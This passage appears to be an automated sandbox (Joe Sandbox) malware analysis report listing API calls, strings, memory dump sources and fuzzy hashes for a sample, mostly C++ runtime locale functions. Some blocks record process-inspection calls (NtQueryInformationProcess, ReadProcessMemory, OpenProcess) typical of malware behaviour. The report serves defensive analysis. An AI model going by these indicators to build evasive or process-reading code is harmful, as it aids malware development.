                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                  • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4BF85
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                  • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                                                  • Opcode ID: 973e2a4be1dc1fd55128d173e32eae8abaa0c2afb32045ed2bafb0b549d3f3c2
                                                                                                                                                                                                                                                  • Instruction ID: 9ead19fed08a8fdb1497c524924c037bf4e41722e0c44711b4458c8305ff9d6a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 973e2a4be1dc1fd55128d173e32eae8abaa0c2afb32045ed2bafb0b549d3f3c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDB1BE7290110AAFCF59DFA8CD55EBE3FB9FB09750F045119FE02A2252D671CA10EBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4855C
                                                                                                                                                                                                                                                  • _Maklocstr.LIBCPMT ref: 00F485C5
                                                                                                                                                                                                                                                  • _Maklocstr.LIBCPMT ref: 00F485D7
                                                                                                                                                                                                                                                  • _Maklocchr.LIBCPMT ref: 00F485EF
                                                                                                                                                                                                                                                  • _Maklocchr.LIBCPMT ref: 00F485FF
                                                                                                                                                                                                                                                  • _Getvals.LIBCPMT ref: 00F48621
                                                                                                                                                                                                                                                    • Part of subcall function 00F41CD4: _Maklocchr.LIBCPMT ref: 00F41D03
                                                                                                                                                                                                                                                    • Part of subcall function 00F41CD4: _Maklocchr.LIBCPMT ref: 00F41D19
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 3549167292-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: fa653f5d8b7eabe3e6026d909b87cb117afec056cb902b2fe81f8051948cf264
                                                                                                                                                                                                                                                  • Instruction ID: 588514ab6ab5b5f141be3aefe4244f55706b0eb5a6e63e801b77c538e44ce5f3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa653f5d8b7eabe3e6026d909b87cb117afec056cb902b2fe81f8051948cf264
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 682181B2D00308ABDF14EFA4DC85ACE7FA8BF05750F048116BD149F142DA74DA44DBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 00F39763
                                                                                                                                                                                                                                                    • Part of subcall function 00F40C94: __EH_prolog3.LIBCMT ref: 00F40C9B
                                                                                                                                                                                                                                                    • Part of subcall function 00F40C94: std::_Lockit::_Lockit.LIBCPMT ref: 00F40CA6
                                                                                                                                                                                                                                                    • Part of subcall function 00F40C94: std::locale::_Setgloballocale.LIBCPMT ref: 00F40CC1
                                                                                                                                                                                                                                                    • Part of subcall function 00F40C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00F40D17
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3978A
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F397F0
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00F3984A
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: __EH_prolog3.LIBCMT ref: 00F3F581
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F5C8
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F620
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F654
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F6A8
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,?,00F854B1,00000000), ref: 00F399BF
                                                                                                                                                                                                                                                  • __cftoe.LIBCMT ref: 00F39B0B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                                  • API String ID: 3103716676-1405518554
                                                                                                                                                                                                                                                  • Opcode ID: f915c26907f82652f60d01fb7c80af8b6827e63a7e0530640d2a451b339a7e9d
                                                                                                                                                                                                                                                  • Instruction ID: ad4d5a2b5b65444f2e27e101a847a8cee1e8e73eea8c52f9e07eacad384884e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f915c26907f82652f60d01fb7c80af8b6827e63a7e0530640d2a451b339a7e9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F1BF71D05249DFDF10CFA8C884BEEBBB1EF49324F144169E805AB381E7B59A04DBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F336D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F33735
                                                                                                                                                                                                                                                    • Part of subcall function 00F336D0: _wcschr.LIBVCRUNTIME ref: 00F337C6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00F33CA8
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00F33D01
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00F33D7A
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00F33EB1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00F33F34
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00F33F7B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • NtQueryInformationProcess, xrefs: 00F33CA2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                                                                                                                  • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                  • API String ID: 566592816-2781105232
                                                                                                                                                                                                                                                  • Opcode ID: a45a5c8db43aa0ad4c712d872dc3733b451d4df25b29af47ffd3a5b33f7e9aed
                                                                                                                                                                                                                                                  • Instruction ID: 5690857886921a815558a381850d5c42216fb4d397252b98f4d44c780e33e2a8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a45a5c8db43aa0ad4c712d872dc3733b451d4df25b29af47ffd3a5b33f7e9aed
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34A14B70D04749DEDB20DF64CC49BAEBBF0BF48724F204599D449A7280E7B9AA88DF51
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,40000022,80A20388,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34154
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,3FFFFFFF,80A20388,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34177
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F34217
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,80A20388,?,?,?), ref: 00F342D2
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,80A20388,?,?,?), ref: 00F342F3
                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,80A20388,?,?,?), ref: 00F34326
                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,80A20388,?,?,?), ref: 00F34337
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34355
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34371
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1424318461-0
                                                                                                                                                                                                                                                  • Opcode ID: 4d50cebf28726a5f85ba3531a31a58a8268f4a41b365b0e6330d24c92f64b898
                                                                                                                                                                                                                                                  • Instruction ID: 22d7f7f69cf39c90cfcec02d88a68a9c1fa73a787f58570ac840598d7a3d1efd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d50cebf28726a5f85ba3531a31a58a8268f4a41b365b0e6330d24c92f64b898
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9819E71E006099FDB14DFA8D985BAEBBB5FB48320F244229E925F73D0D770B9409B94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00F526F8
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F52786
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F527B0
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F527F8
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F52812
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F52838
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F52875
                                                                                                                                                                                                                                                  • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00F52892
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3603178046-0
                                                                                                                                                                                                                                                  • Opcode ID: 41815f00caec4df7c0ceef6d834fa6dac2c76abdeb990b399e5b06147be6c4a2
                                                                                                                                                                                                                                                  • Instruction ID: 3e72a4db479708860f5deb3043dc3c92a3b20532f8d16fca13cf0b3ea7bbddd7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41815f00caec4df7c0ceef6d834fa6dac2c76abdeb990b399e5b06147be6c4a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E71A732D002099FDF619FA4DC85AEE7BB5EF4B362F18021AEE04A7151D735C848E760
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00F521A3
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F521CF
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00F5220E
                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5222B
                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00F5226A
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F52287
                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F522C9
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F522EC
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2040435927-0
                                                                                                                                                                                                                                                  • Opcode ID: 7ba7c51b99db859c3d4872e5d9ec73d2034f5f003da4509e5b5c8052c093caf0
                                                                                                                                                                                                                                                  • Instruction ID: 3744f145cd87e835538b775c13bbe67b4f70199aaa94301ab7e04887710d0381
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ba7c51b99db859c3d4872e5d9ec73d2034f5f003da4509e5b5c8052c093caf0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C951C37290020AAFEB605F64CC45FAF7BA9EF46752F114228FF15E6150D734CD18ABA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000044,00000000,80A20388,?,00000000), ref: 00F386F9
                                                                                                                                                                                                                                                  • __Getctype.LIBCPMT ref: 00F3877B
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F387E4
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2372200979-0
                                                                                                                                                                                                                                                  • Opcode ID: e412937406b567245955892ba4bc41f919361d08fea8fc47f2e0d5182200ee2b
                                                                                                                                                                                                                                                  • Instruction ID: b5f8295f726968265ab1a5141a1f251ef31af0b8b19667028acd7231cf5040b2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e412937406b567245955892ba4bc41f919361d08fea8fc47f2e0d5182200ee2b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3861C471C00748DFDB11CF68C9407AABBF0EF14364F148159E845AB291EB78AE45EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000018,00000000,80A20388,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00F39342
                                                                                                                                                                                                                                                  • __Getctype.LIBCPMT ref: 00F393BD
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F393F8
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2372200979-0
                                                                                                                                                                                                                                                  • Opcode ID: d025baa3bfed1d52c7650ca4328ac73558b961a4deb1a1ba8312f61d2c30a9a1
                                                                                                                                                                                                                                                  • Instruction ID: 6618cf343641e494afb155895f4482d801b8f96dd2edf06979c0a09ab6a6c6c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d025baa3bfed1d52c7650ca4328ac73558b961a4deb1a1ba8312f61d2c30a9a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F51BFB1D08209DFCB11DF68C844BAEBBF4EF14724F148159E845AB391D7B4AA40EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00F53F57
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00F53F5F
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00F53FE8
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00F54013
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00F54068
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: e38439e54a571c2cd459715d25be6fd08a20cbfd3ad1604325e6aa960382e941
                                                                                                                                                                                                                                                  • Instruction ID: 814cd7268e443e15c7665551f43c262e63006fdeb269ef018756dbd38fd1b704
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e38439e54a571c2cd459715d25be6fd08a20cbfd3ad1604325e6aa960382e941
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A41D234E002089BCF14DF68CC81A9EBBF1AF44369F148055EE189B392D735EA09EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00F67408,00F63841,0000000C,?,00000000,00000000,?,00F67632,00000021,FlsSetValue,00F7BD58,00F7BD60,?), ref: 00F673BC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                  • Opcode ID: 743fad180085bbacbf23ed7674b5e45bb9f9bb7362fecd1554addb464e8b9a18
                                                                                                                                                                                                                                                  • Instruction ID: ef0101cda76669dfcb32864a13f60a694fb526ea2891959d59f69cdc6c5c512b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 743fad180085bbacbf23ed7674b5e45bb9f9bb7362fecd1554addb464e8b9a18
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A21E436F09315EBCB21BB64AC42A6A37699F42774F240220FD19A7390E771ED00F6E1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B531
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B54F
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B577
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,0000000C,00000000,80A20388,?,00000000,00000000), ref: 00F3B5CF
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3B6B7
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B6E1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3931714976-0
